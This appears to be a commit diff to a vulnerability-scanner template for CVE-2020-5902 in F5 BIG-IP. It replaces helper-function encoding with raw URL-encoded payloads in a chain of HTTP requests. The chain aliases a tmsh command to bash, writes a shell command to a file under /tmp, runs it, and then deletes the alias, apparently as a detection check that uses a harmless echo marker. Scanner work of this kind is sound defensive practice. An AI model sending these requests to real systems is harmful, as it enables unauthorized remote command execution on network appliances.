Merge pull request #205 from dwisiswant0/update-cve-2020-5902

Update RAW payloads due to can't use helper function - CVE-2020-5902
2020-07-06 22:19:31 +05:30 · 2020-07-06 22:19:31 +05:30 · 63289fb700
parent 6f7aa0570e d19f00bf82
commit 63289fb700
1 changed files with 4 additions and 4 deletions
--- a/cves/CVE-2020-5902.yaml
+++ b/cves/CVE-2020-5902.yaml
@ -30,28 +30,28 @@ requests:
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

-        command={{url_encode("create cli alias private list command bash")}}
+        command=create%20cli%20alias%20private%20list%20command%20bash
      - |
        POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

-        fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
+        fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
      - |
        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

-        command={{url_encode("list /tmp/nonexistent")}}
+        command=list%20%2Ftmp%2Fnonexistent
      - |
        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

-        command={{url_encode("delete cli alias private list")}}
+        command=delete%20cli%20alias%20private%20list
    matchers-condition: and
    matchers:
      - type: status